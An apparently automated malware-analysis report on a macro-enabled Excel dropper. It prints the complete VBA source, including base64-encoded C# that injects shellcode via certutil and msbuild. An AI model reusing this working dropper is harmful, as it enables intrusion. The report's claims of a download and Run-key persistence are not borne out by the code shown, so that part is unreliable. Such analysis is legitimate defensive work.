Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 3520b11fd465353a…

MALICIOUS

Office (OOXML)

679.9 KB Created: 2018-06-12 16:48:25 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2019-11-20
MD5: 0156a98870033b37d1a6eb40390e1b73 SHA-1: d62a9c3e17e75a64f9692b7a7dad1fd78b1c4383 SHA-256: 3520b11fd465353a56e9fbbe33245a1699ffb95833d156b22984abbaaa512d8c
406 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1218.005 System Binary Proxy Execution: Msbuild T1140 Deobfuscate/Decode Files or Information T1218.009 System Binary Proxy Execution: Regsvr32

The sample is a macro-enabled Excel document containing Auto_Open and Workbook_Open macros, indicating immediate execution upon opening. The VBA script utilizes `CreateObject` and `GetObject` to launch `certutil.exe` and `msbuild.exe` for downloading and executing a second-stage payload from a constructed XML file. It also attempts to establish persistence by creating a Run key entry named 'OfficeUpdate'. The script's obfuscation and use of legitimate system binaries to download and execute further code are characteristic of a dropper.

Heuristics 11

  • ClamAV: Doc.Dropper.Agent-7080481-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7080481-0
  • VBA project inside OOXML medium 8 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
        cu = "certutil"
        ex = "exe"
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
    Matched line in script
    Public Function GEeROixMEn() As Variant
        Set fs = CreateObject("Scripting.FileSystemObject")
        Set TmpFolder = fs.GetSpecialFolder(2)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Public Function GEeROixMEn() As Variant
        Set fs = CreateObject("Scripting.FileSystemObject")
        Set TmpFolder = fs.GetSpecialFolder(2)
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        Set ObjWS = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
        Set objS = ObjWS.Get("Win32_ProcessStartup")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Workbook_Open()
        Auto_Open
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
        Dim exdate As Date
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Sub ArmySafe()
        strDomain = Environ("USERDOMAIN")
        arrDomains = Split("NASW,nasw,NANW,nanw,NAE,nae,NASE,nase,NG,ng,MI,mi,AMED,amed,RSNI,rsni,MHS,mhs,QUIROZ1,quiroz1,PENTEST-01,pentest-01", ",")
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 15634 bytes
SHA-256: e90b2c4b7b2d5152ca40d53e0c2262e170e7d3ac8914f71aa2f0685411228e5a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
119 of 188 identifiers look randomly generated (e.g. 'eVJlYWQ9MHgwMDAwMDAxMCxWaXJ0dWFsTWVtb3J5') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Dim fs As Object
Dim TmpFolder As Object
Dim env
Dim cu
Dim ecu As String
Dim emsb As String
Dim ex
Dim msb
Dim officeDir As String
Dim msbPath As String
Dim TmpFile
Dim windir
Dim wmsb As Object
Dim strLocation As String

Sub Auto_Open()
    Dim exdate As Date
    exdate = "06/22/2018"
    If Date < exdate Then
        ArmySafe
    End If
End Sub

Sub ArmySafe()
    strDomain = Environ("USERDOMAIN")
    arrDomains = Split("NASW,nasw,NANW,nanw,NAE,nae,NASE,nase,NG,ng,MI,mi,AMED,amed,RSNI,rsni,MHS,mhs,QUIROZ1,quiroz1,PENTEST-01,pentest-01", ",")
    If (UBound(Filter(arrDomains, strDomain)) > -1) = True Then
        Call GoPwn
    End If
End Sub

Sub GoPwn()
    Call GEeROixMEn
End Sub

Public Function GEeROixMEn() As Variant
    Set fs = CreateObject("Scripting.FileSystemObject")
    Set TmpFolder = fs.GetSpecialFolder(2)

    cu = "certutil"
    ex = "exe"
    msb = "msbuild"
    env = CStr(Environ("USERPROFILE"))
    windir = CStr(Environ("WINDIR"))
    officeDir = env & "\AppData\Local\Microsoft\Office\"
    msbPath = windir & "\Microsoft.NET\Framework\v4.0.30319\"
    strLocation = officeDir & "\DvNqUT.xml"
    TmpFile = "\suMXUxtQWFQiXZ.txt"

    dPuOigCljRK = "PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQu"
    dPuOigCljRK = dPuOigCljRK + "Y29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPjxUYXJnZXQgTmFtZT0iR2VDVHFzRHpRdGtuQVUiPjxD"
    dPuOigCljRK = dPuOigCljRK + "bGFzc0V4YW1wbGUgLz48L1RhcmdldD48VXNpbmdUYXNrIFRhc2tOYW1lPSJDbGFzc0V4YW1wbGUiIFRh"
    dPuOigCljRK = dPuOigCljRK + "c2tGYWN0b3J5PSJDb2RlVGFza0ZhY3RvcnkiIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3Nv"
    dPuOigCljRK = dPuOigCljRK + "ZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCI+"
    dPuOigCljRK = dPuOigCljRK + "PFRhc2s+PFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPjxVc2luZyBOYW1lc3BhY2U9IlN5c3RlbS5S"
    dPuOigCljRK = dPuOigCljRK + "ZWZsZWN0aW9uIiAvPjxVc2luZyBOYW1lc3BhY2U9IlN5c3RlbS5EaWFnbm9zdGljcyIgLz48VXNpbmcg"
    dPuOigCljRK = dPuOigCljRK + "TmFtZXNwYWNlPSJTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMiIC8+PENvZGUgVHlwZT0iQ2xh"
    dPuOigCljRK = dPuOigCljRK + "c3MiIExhbmd1YWdlPSJjcyI+PCFbQ0RBVEFbdXNpbmcgU3lzdGVtO3VzaW5nIFN5c3RlbS5SZWZsZWN0"
    dPuOigCljRK = dPuOigCljRK + "aW9uO3VzaW5nIE1pY3Jvc29mdC5DU2hhcnA7dXNpbmcgTWljcm9zb2Z0LkJ1aWxkLkZyYW1ld29yazt1"
    dPuOigCljRK = dPuOigCljRK + "c2luZyBNaWNyb3NvZnQuQnVpbGQuVXRpbGl0aWVzO3VzaW5nIFN5c3RlbS5EaWFnbm9zdGljczt1c2lu"
    dPuOigCljRK = dPuOigCljRK + "ZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7cHVibGljIGNsYXNzIENsYXNzRXhhbXBsZTpU"
    dPuOigCljRK = dPuOigCljRK + "YXNrLElUYXNre3B1YmxpYyBvdmVycmlkZSBib29sIEV4ZWN1dGUoKXtQcm9ncmFtLk1haW4oKTtyZXR1"
    dPuOigCljRK = dPuOigCljRK + "cm4gdHJ1ZTt9fXB1YmxpYyBjbGFzcyBQcm9ncmFte3B1YmxpYyBzdGF0aWMgdm9pZCBNYWluKCl7c3Ry"
    dPuOigCljRK = dPuOigCljRK + "aW5nIHN0clNoZWxsQ29kZT0iL09pSkFBQUFZSW5sTWRKa2kxSXdpMUlNaTFJVWkzSW9EN2RLSmpIL01j"
    dPuOigCljRK = dPuOigCljRK + "Q3NQR0Y4QWl3Z3djOE5BY2ZpOEZKWGkxSVFpMEk4QWRDTFFIaUZ3SFJLQWRCUWkwZ1lpMWdnQWRQalBF"
    dPuOigCljRK = dPuOigCljRK + "bUxOSXNCMWpIL01jQ3N3YzhOQWNjNDRIWDBBMzM0TzMwa2RlSllpMWdrQWRObWl3eExpMWdjQWRPTEJJ"
    dPuOigCljRK = dPuOigCljRK + "c0IwSWxFSkNSYlcyRlpXbEgvNEZoZldvc1M2NFpkYUc1bGRBQm9kMmx1YVZSb1RIY21CLy9WNkFBQUFB"
    dPuOigCljRK = dPuOigCljRK + "QXgvMWRYVjFkWGFEcFdlYWYvMWVta0FBQUFXekhKVVZGcUExRlJhUHNnQUFCVFVHaFhpWi9HLzlWUTZZ"
    dPuOigCljRK = dPuOigCljRK + "d0FBQUJiTWRKU2FBQXlvSVJTVWxKVFVsQm82MVV1Ty8vVmljYUR3MUJvZ0RNQUFJbmdhZ1JRYWg5V2FI"
    dPuOigCljRK = dPuOigCljRK + "Vkdub2IvMVY4eC8xZFhhdjlUVm1ndEJoaDcvOVdGd0ErRXlnRUFBREgvaGZaMEJJbjU2d2xvcXNYaVhm"
    dPuOigCljRK = dPuOigCljRK + "L1ZpY0ZvUlNGZU1mL1ZNZjlYYWdkUlZsQm90MWZnQy8vVnZ3QXZBQUE1eDNVSFdGRHBlLy8vL3pILzZa"
    dPuOigCljRK = dPuOigCljRK + "RUJBQURweVFFQUFPaHYvLy8vTDFwaU4ya0FTQ3crODdFRERudVlNSi9XdEJRd0VsVGpZNnVrYzNmNXZj"
    dPuOigCljRK = dPuOigCljRK + "clk0S1RpQkRFNS9TaW9ZRmlyU2lSZTNsQXZoSEhMY3B5YkZUSHNZZ1lrejdwR2V5amJxU05aUVFvQ2lt"
    dPuOigCljRK = dPuOigCljRK + "RVFIZ0JWYzJWeUxVRm5aVzUwT2lCTmIzcHBiR3hoTHpVdU1DQW9ZMjl0Y0dGMGFXSnNaVHNnVFZOSlJT"
    dPuOigCljRK = dPuOigCljRK + "QTVMakE3SUZkcGJtUnZkM01nVGxRZ05pNHhPeUJVY21sa1pXNTBMelV1TUNrTkNnQmRIR1loZXIrNHQx"
    dPuOigCljRK = dPuOigCljRK + "UmZ2WEV2OEZnS1JwaVZtcCtPUmJuUWZaeW1PTE52aVNzTnBJdkZZR2svMll2c2o2bzVKenN2Vmw5eHdB"
    dPuOigCljRK = dPuOigCljRK + "ZjVZRWE5TkcvdmRRYmNqdXpWSi9aeEhXS2ZpZk5McGdNNG1VUm10eGJxanlBa1RndDM0MnF3UTI1Znk4"
    dPuOigCljRK = dPuOigCljRK + "UmVOVXFwWk52azJSMCthREM0S2EwVU0yNjN0RVp2S0dhZjRMM0FzK0gxbkRrNHpteFQ2cjRQbktydXUy"
    dPuOigCljRK = dPuOigCljRK + "c0RwQkZ3UnBHYWtBMGtVN1p0MTdJZkJhNHZyN3c4OThURUs0dEpPZng0VE5Ed3ovZjlGbE9tVUZlL3Vj"
    dPuOigCljRK = dPuOigCljRK + "bmtnRUtpc0t6em9NU2pXU3BVT0Y2cGxBMkx6dGRYRkVaOHRMMTV3YVJpSWtDdFpsd0FhUEMxb2xiLzFX"
    dPuOigCljRK = dPuOigCljRK + "cEFhQUFRQUFCb0FBQkFBRmRvV0tSVDVmL1ZrN2tBQUFBQUFkbFJVNG5uVjJnQUlBQUFVMVpvRXBhSjR2"
    dPuOigCljRK = dPuOigCljRK + "L1ZoY0IweG9zSEFjT0Z3SFhsV01Qb2lmMy8vekl4TkM0ekxqYzNMalF5QUhJR1czST0iO2J5dGVbXXNo"
    dPuOigCljRK = dPuOigCljRK + "ZWxsY29kZT1TeXN0ZW0uQ29udmVydC5Gcm9tQmFzZTY0U3RyaW5nKHN0clNoZWxsQ29kZSk7c3RyaW5n"
    dPuOigCljRK = dPuOigCljRK + "IHByb2Nlc3NwYXRoPUAiQzpcV2luZG93c1xTeXN0ZW0zMlx3c21wcm92aG9zdC5leGUiO1NUQVJUVVBJ"
    dPuOigCljRK = dPuOigCljRK + "TkZPIHNpPW5ldyBTVEFSVFVQSU5GTygpO1BST0NFU1NfSU5GT1JNQVRJT04gcGk9bmV3IFBST0NFU1Nf"
    dPuOigCljRK = dPuOigCljRK + "SU5GT1JNQVRJT04oKTtib29sIHN1Y2Nlc3M9Q3JlYXRlUHJvY2Vzcyhwcm9jZXNzcGF0aCxudWxsLElu"
    dPuOigCljRK = dPuOigCljRK + "dFB0ci5aZXJvLEludFB0ci5aZXJvLGZhbHNlLFByb2Nlc3NDcmVhdGlvbkZsYWdzLkNSRUFURV9TVVNQ"
    dPuOigCljRK = dPuOigCljRK + "RU5ERUQsSW50UHRyLlplcm8sbnVsbCxyZWYgc2ksb3V0IHBpKTtJbnRQdHIgcmVzdWx0UHRyPVZpcnR1"
    dPuOigCljRK = dPuOigCljRK + "YWxBbGxvY0V4KHBpLmhQcm9jZXNzLEludFB0ci5aZXJvLHNoZWxsY29kZS5MZW5ndGgsTUVNX0NPTU1J"
    dPuOigCljRK = dPuOigCljRK + "VCxQQUdFX1JFQURXUklURSk7SW50UHRyIGJ5dGVzV3JpdHRlbj1JbnRQdHIuWmVybztib29sIHJlc3Vs"
    dPuOigCljRK = dPuOigCljRK + "dEJvb2w9V3JpdGVQcm9jZXNzTWVtb3J5KHBpLmhQcm9jZXNzLHJlc3VsdFB0cixzaGVsbGNvZGUsc2hl"
    dPuOigCljRK = dPuOigCljRK + "bGxjb2RlLkxlbmd0aCxvdXQgYnl0ZXNXcml0dGVuKTtJbnRQdHIgc2h0PU9wZW5UaHJlYWQoVGhyZWFk"
    dPuOigCljRK = dPuOigCljRK + "QWNjZXNzLlNFVF9DT05URVhULGZhbHNlLChpbnQpcGkuZHdUaHJlYWRJZCk7dWludCBvbGRQcm90ZWN0"
    dPuOigCljRK = dPuOigCljRK + "PTA7cmVzdWx0Qm9vbD1WaXJ0dWFsUHJvdGVjdEV4KHBpLmhQcm9jZXNzLHJlc3VsdFB0cixzaGVsbGNv"
    dPuOigCljRK = dPuOigCljRK + "ZGUuTGVuZ3RoLFBBR0VfRVhFQ1VURV9SRUFELG91dCBvbGRQcm90ZWN0KTtJbnRQdHIgcHRyPVF1ZXVl"
    dPuOigCljRK = dPuOigCljRK + "VXNlckFQQyhyZXN1bHRQdHIsc2h0LEludFB0ci5aZXJvKTtJbnRQdHIgVGhyZWFkSGFuZGxlPXBpLmhU"
    dPuOigCljRK = dPuOigCljRK + "aHJlYWQ7UmVzdW1lVGhyZWFkKFRocmVhZEhhbmRsZSk7fXByaXZhdGUgc3RhdGljIFVJbnQzMiBNRU1f"
    dPuOigCljRK = dPuOigCljRK + "Q09NTUlUPTB4MTAwMDtwcml2YXRlIHN0YXRpYyBVSW50MzIgUEFHRV9FWEVDVVRFX1JFQURXUklURT0w"
    dPuOigCljRK = dPuOigCljRK + "eDQwO3ByaXZhdGUgc3RhdGljIFVJbnQzMiBQQUdFX1JFQURXUklURT0weDA0O3ByaXZhdGUgc3RhdGlj"
    dPuOigCljRK = dPuOigCljRK + "IFVJbnQzMiBQQUdFX0VYRUNVVEVfUkVBRD0weDIwO1tGbGFnc11wdWJsaWMgZW51bSBQcm9jZXNzQWNj"
    dPuOigCljRK = dPuOigCljRK + "ZXNzRmxhZ3M6dWludHtBbGw9MHgwMDFGMEZGRixUZXJtaW5hdGU9MHgwMDAwMDAwMSxDcmVhdGVUaHJl"
    dPuOigCljRK = dPuOigCljRK + "YWQ9MHgwMDAwMDAwMixWaXJ0dWFsTWVtb3J5T3BlcmF0aW9uPTB4MDAwMDAwMDgsVmlydHVhbE1lbW9y"
    dPuOigCljRK = dPuOigCljRK + "eVJlYWQ9MHgwMDAwMDAxMCxWaXJ0dWFsTWVtb3J5V3JpdGU9MHgwMDAwMDAyMCxEdXBsaWNhdGVIYW5k"
    dPuOigCljRK = dPuOigCljRK + "bGU9MHgwMDAwMDA0MCxDcmVhdGVQcm9jZXNzPTB4MDAwMDAwMDgwLFNldFF1b3RhPTB4MDAwMDAxMDAs"
    dPuOigCljRK = dPuOigCljRK + "U2V0SW5mb3JtYXRpb249MHgwMDAwMDIwMCxRdWVyeUluZm9ybWF0aW9uPTB4MDAwMDA0MDAsUXVlcnlM"
    dPuOigCljRK = dPuOigCljRK + "aW1pdGVkSW5mb3JtYXRpb249MHgwMDAwMTAwMCxTeW5jaHJvbml6ZT0weDAwMTAwMDAwfVtGbGFnc11w"
    dPuOigCljRK = dPuOigCljRK + "dWJsaWMgZW51bSBQcm9jZXNzQ3JlYXRpb25GbGFnczp1aW50e1pFUk9fRkxBRz0weDAwMDAwMDAwLENS"
    dPuOigCljRK = dPuOigCljRK + "RUFURV9CUkVBS0FXQVlfRlJPTV9KT0I9MHgwMTAwMDAwMCxDUkVBVEVfREVGQVVMVF9FUlJPUl9NT0RF"
    dPuOigCljRK = dPuOigCljRK + "PTB4MDQwMDAwMDAsQ1JFQVRFX05FV19DT05TT0xFPTB4MDAwMDAwMTAsQ1JFQVRFX05FV19QUk9DRVNT"
    dPuOigCljRK = dPuOigCljRK + "X0dST1VQPTB4MDAwMDAyMDAsQ1JFQVRFX05PX1dJTkRPVz0weDA4MDAwMDAwLENSRUFURV9QUk9URUNU"
    dPuOigCljRK = dPuOigCljRK + "RURfUFJPQ0VTUz0weDAwMDQwMDAwLENSRUFURV9QUkVTRVJWRV9DT0RFX0FVVEhaX0xFVkVMPTB4MDIw"
    dPuOigCljRK = dPuOigCljRK + "MDAwMDAsQ1JFQVRFX1NFUEFSQVRFX1dPV19WRE09MHgwMDAwMTAwMCxDUkVBVEVfU0hBUkVEX1dPV19W"
    dPuOigCljRK = dPuOigCljRK + "RE09MHgwMDAwMTAwMCxDUkVBVEVfU1VTUEVOREVEPTB4MDAwMDAwMDQsQ1JFQVRFX1VOSUNPREVfRU5W"
    dPuOigCljRK = dPuOigCljRK + "SVJPTk1FTlQ9MHgwMDAwMDQwMCxERUJVR19PTkxZX1RISVNfUFJPQ0VTUz0weDAwMDAwMDAyLERFQlVH"
    dPuOigCljRK = dPuOigCljRK + "X1BST0NFU1M9MHgwMDAwMDAwMSxERVRBQ0hFRF9QUk9DRVNTPTB4MDAwMDAwMDgsRVhURU5ERURfU1RB"
    dPuOigCljRK = dPuOigCljRK + "UlRVUElORk9fUFJFU0VOVD0weDAwMDgwMDAwLElOSEVSSVRfUEFSRU5UX0FGRklOSVRZPTB4MDAwMTAw"
    dPuOigCljRK = dPuOigCljRK + "MDB9cHVibGljIHN0cnVjdCBQUk9DRVNTX0lORk9STUFUSU9Oe3B1YmxpYyBJbnRQdHIgaFByb2Nlc3M7"
    dPuOigCljRK = dPuOigCljRK + "cHVibGljIEludFB0ciBoVGhyZWFkO3B1YmxpYyB1aW50IGR3UHJvY2Vzc0lkO3B1YmxpYyB1aW50IGR3"
    dPuOigCljRK = dPuOigCljRK + "VGhyZWFkSWQ7fXB1YmxpYyBzdHJ1Y3QgU1RBUlRVUElORk97cHVibGljIHVpbnQgY2I7cHVibGljIHN0"
    dPuOigCljRK = dPuOigCljRK + "cmluZyBscFJlc2VydmVkO3B1YmxpYyBzdHJpbmcgbHBEZXNrdG9wO3B1YmxpYyBzdHJpbmcgbHBUaXRs"
    dPuOigCljRK = dPuOigCljRK + "ZTtwdWJsaWMgdWludCBkd1g7cHVibGljIHVpbnQgZHdZO3B1YmxpYyB1aW50IGR3WFNpemU7cHVibGlj"
    dPuOigCljRK = dPuOigCljRK + "IHVpbnQgZHdZU2l6ZTtwdWJsaWMgdWludCBkd1hDb3VudENoYXJzO3B1YmxpYyB1aW50IGR3WUNvdW50"
    dPuOigCljRK = dPuOigCljRK + "Q2hhcnM7cHVibGljIHVpbnQgZHdGaWxsQXR0cmlidXRlO3B1YmxpYyB1aW50IGR3RmxhZ3M7cHVibGlj"
    dPuOigCljRK = dPuOigCljRK + "IHNob3J0IHdTaG93V2luZG93O3B1YmxpYyBzaG9ydCBjYlJlc2VydmVkMjtwdWJsaWMgSW50UHRyIGxw"
    dPuOigCljRK = dPuOigCljRK + "UmVzZXJ2ZWQyO3B1YmxpYyBJbnRQdHIgaFN0ZElucHV0O3B1YmxpYyBJbnRQdHIgaFN0ZE91dHB1dDtw"
    dPuOigCljRK = dPuOigCljRK + "dWJsaWMgSW50UHRyIGhTdGRFcnJvcjt9W0ZsYWdzXXB1YmxpYyBlbnVtIFRocmVhZEFjY2VzczppbnR7"
    dPuOigCljRK = dPuOigCljRK + "VEVSTUlOQVRFPSgweDAwMDEpLFNVU1BFTkRfUkVTVU1FPSgweDAwMDIpLEdFVF9DT05URVhUPSgweDAw"
    dPuOigCljRK = dPuOigCljRK + "MDgpLFNFVF9DT05URVhUPSgweDAwMTApLFNFVF9JTkZPUk1BVElPTj0oMHgwMDIwKSxRVUVSWV9JTkZP"
    dPuOigCljRK = dPuOigCljRK + "Uk1BVElPTj0oMHgwMDQwKSxTRVRfVEhSRUFEX1RPS0VOPSgweDAwODApLElNUEVSU09OQVRFPSgweDAx"
    dPuOigCljRK = dPuOigCljRK + "MDApLERJUkVDVF9JTVBFUlNPTkFUSU9OPSgweDAyMDApfVtEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIs"
    dPuOigCljRK = dPuOigCljRK + "U2V0TGFzdEVycm9yPXRydWUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBPcGVuVGhyZWFkKFRo"
    dPuOigCljRK = dPuOigCljRK + "cmVhZEFjY2VzcyBkd0Rlc2lyZWRBY2Nlc3MsYm9vbCBiSW5oZXJpdEhhbmRsZSxpbnQgZHdUaHJlYWRJ"
    dPuOigCljRK = dPuOigCljRK + "ZCk7W0RsbEltcG9ydCgia2VybmVsMzIuZGxsIixTZXRMYXN0RXJyb3I9dHJ1ZSldcHVibGljIHN0YXRp"
    dPuOigCljRK = dPuOigCljRK + "YyBleHRlcm4gYm9vbCBXcml0ZVByb2Nlc3NNZW1vcnkoSW50UHRyIGhQcm9jZXNzLEludFB0ciBscEJh"
    dPuOigCljRK = dPuOigCljRK + "c2VBZGRyZXNzLGJ5dGVbXWxwQnVmZmVyLGludCBuU2l6ZSxvdXQgSW50UHRyIGxwTnVtYmVyT2ZCeXRl"
    dPuOigCljRK = dPuOigCljRK + "c1dyaXR0ZW4pO1tEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIElu"
    dPuOigCljRK = dPuOigCljRK + "dFB0ciBRdWV1ZVVzZXJBUEMoSW50UHRyIHBmbkFQQyxJbnRQdHIgaFRocmVhZCxJbnRQdHIgZHdEYXRh"
    dPuOigCljRK = dPuOigCljRK + "KTtbRGxsSW1wb3J0KCJrZXJuZWwzMiIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBWaXJ0dWFs"
    dPuOigCljRK = dPuOigCljRK + "QWxsb2MoVUludDMyIGxwU3RhcnRBZGRyLEludDMyIHNpemUsVUludDMyIGZsQWxsb2NhdGlvblR5cGUs"
    dPuOigCljRK = dPuOigCljRK + "VUludDMyIGZsUHJvdGVjdCk7W0RsbEltcG9ydCgia2VybmVsMzIuZGxsIixTZXRMYXN0RXJyb3I9dHJ1"
    dPuOigCljRK = dPuOigCljRK + "ZSApXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBWaXJ0dWFsQWxsb2NFeChJbnRQdHIgaFByb2Nl"
    dPuOigCljRK = dPuOigCljRK + "c3MsSW50UHRyIGxwQWRkcmVzcyxJbnQzMiBkd1NpemUsVUludDMyIGZsQWxsb2NhdGlvblR5cGUsVUlu"
    dPuOigCljRK = dPuOigCljRK + "dDMyIGZsUHJvdGVjdCk7W0RsbEltcG9ydCgia2VybmVsMzIuZGxsIixTZXRMYXN0RXJyb3I9dHJ1ZSld"
    dPuOigCljRK = dPuOigCljRK + "cHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIE9wZW5Qcm9jZXNzKFByb2Nlc3NBY2Nlc3NGbGFncyBw"
    dPuOigCljRK = dPuOigCljRK + "cm9jZXNzQWNjZXNzLGJvb2wgYkluaGVyaXRIYW5kbGUsaW50IHByb2Nlc3NJZCApO1tEbGxJbXBvcnQo"
    dPuOigCljRK = dPuOigCljRK + "Imtlcm5lbDMyLmRsbCIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIGJvb2wgQ3JlYXRlUHJvY2VzcyhzdHJp"
    dPuOigCljRK = dPuOigCljRK + "bmcgbHBBcHBsaWNhdGlvbk5hbWUsc3RyaW5nIGxwQ29tbWFuZExpbmUsSW50UHRyIGxwUHJvY2Vzc0F0"
    dPuOigCljRK = dPuOigCljRK + "dHJpYnV0ZXMsSW50UHRyIGxwVGhyZWFkQXR0cmlidXRlcyxib29sIGJJbmhlcml0SGFuZGxlcyxQcm9j"
    dPuOigCljRK = dPuOigCljRK + "ZXNzQ3JlYXRpb25GbGFncyBkd0NyZWF0aW9uRmxhZ3MsSW50UHRyIGxwRW52aXJvbm1lbnQsc3RyaW5n"
    dPuOigCljRK = dPuOigCljRK + "IGxwQ3VycmVudERpcmVjdG9yeSxyZWYgU1RBUlRVUElORk8gbHBTdGFydHVwSW5mbyxvdXQgUFJPQ0VT"
    dPuOigCljRK = dPuOigCljRK + "U19JTkZPUk1BVElPTiBscFByb2Nlc3NJbmZvcm1hdGlvbik7W0RsbEltcG9ydCgia2VybmVsMzIuZGxs"
    dPuOigCljRK = dPuOigCljRK + "IildcHVibGljIHN0YXRpYyBleHRlcm4gdWludCBSZXN1bWVUaHJlYWQoSW50UHRyIGhUaHJlYWQpO1tE"
    dPuOigCljRK = dPuOigCljRK + "bGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIHVpbnQgU3VzcGVuZFRo"
    dPuOigCljRK = dPuOigCljRK + "cmVhZChJbnRQdHIgaFRocmVhZCk7W0RsbEltcG9ydCgia2VybmVsMzIuZGxsIildcHVibGljIHN0YXRp"
    dPuOigCljRK = dPuOigCljRK + "YyBleHRlcm4gYm9vbCBWaXJ0dWFsUHJvdGVjdEV4KEludFB0ciBoUHJvY2VzcyxJbnRQdHIgbHBBZGRy"
    dPuOigCljRK = dPuOigCljRK + "ZXNzLGludCBkd1NpemUsdWludCBmbE5ld1Byb3RlY3Qsb3V0IHVpbnQgbHBmbE9sZFByb3RlY3QpO31d"
    dPuOigCljRK = dPuOigCljRK + "XT48L0NvZGU+PC9UYXNrPjwvVXNpbmdUYXNrPjwvUHJvamVjdD4="

    Set wmsb = fs.CreateTextFile(TmpFolder & TmpFile, True)
    wmsb.WriteLine dPuOigCljRK
    wmsb.Close

    Const HIDDEN_WINDOW = 0
    strComputer = "."

    ecu = cu & strComputer & ex & " " & "-decode -f" & " " & TmpFolder & TmpFile & " " & strLocation

    Set ObjWS = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objS = ObjWS.Get("Win32_ProcessStartup")
    Set objC = objS.SpawnInstance_
    objC.ShowWindow = HIDDEN_WINDOW
    Set objP = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    objP.Create ecu, Null, objC, intProcessID

    emsb = msbPath & msb & strComputer & ex & " " & strLocation

    Set ObjWS = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objS = ObjWS.Get("Win32_ProcessStartup")
    Set objC = objS.SpawnInstance_
    objC.ShowWindow = HIDDEN_WINDOW
    Set objP = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    objP.Create emsb, Null, objC, intProcessID
End Function

Sub Macro2()
    ActiveSheet.Shapes.Range(Array("Picture 1")).Select
    Selection.ShapeRange.ZOrder msoSendToBack
    ActiveSheet.Shapes.Range(Array("Picture 3")).Select
    Selection.ShapeRange.ZOrder msoSendToBack
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
    Auto_Open
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 39936 bytes
SHA-256: a0e50844b0401f5a67dc00d60459dfcf7308e0acaeca701360e26ffedc153a54
Detection
ClamAV: Doc.Dropper.Agent-7080481-0
Obfuscation or payload: likely
414 of 700 identifiers look randomly generated (e.g. 'ZSApXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0') — consistent with name-mangling obfuscation.